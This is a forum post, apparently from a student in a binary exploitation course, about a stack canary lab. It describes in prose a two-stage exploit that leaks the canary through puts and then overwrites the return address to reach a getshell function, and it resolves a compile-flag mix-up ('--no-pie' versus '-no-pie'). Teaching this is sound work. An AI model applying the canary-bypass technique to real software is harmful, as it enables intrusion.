Stack Cookie - return address is random

Hi all-

I went through the stack cookie module last night. I compiled the binary on a 64-bit system:

gcc -m32 --no-pie canary.c -o canary

I went through the slides and created the pwntools python file to run the multistage exploit:
1 - first buffer write leads to a leak of the stack canary (since the 0x00 byte becomes 0xa from the newline and puts goes until it encounters a 0x00 byte) without overflowing the buffer
2- the second buffer write overflows while writing the correct stack canary to the correct place in the buffer and overwrites what will become EIP with a hardcoded return address

In the slides the hardcoded return address is for the dead function getshell obtained either through info functions or p getshell but when I run the exploit the prompt segfaults at the end. I determined that this is because the return address is wrong. Upon further inspection the address for getshell is different each time I run it in gdb.

This exercise is supposed to have the system ASLR enabled and it’s not supposed to matter. Why is the address for getshell changing?


I found the problem:

--no-pie is NOT the same as -no-pie

The program should be compiled like this:

gcc -m32 -no-pie canary.c -o canary

Now it works.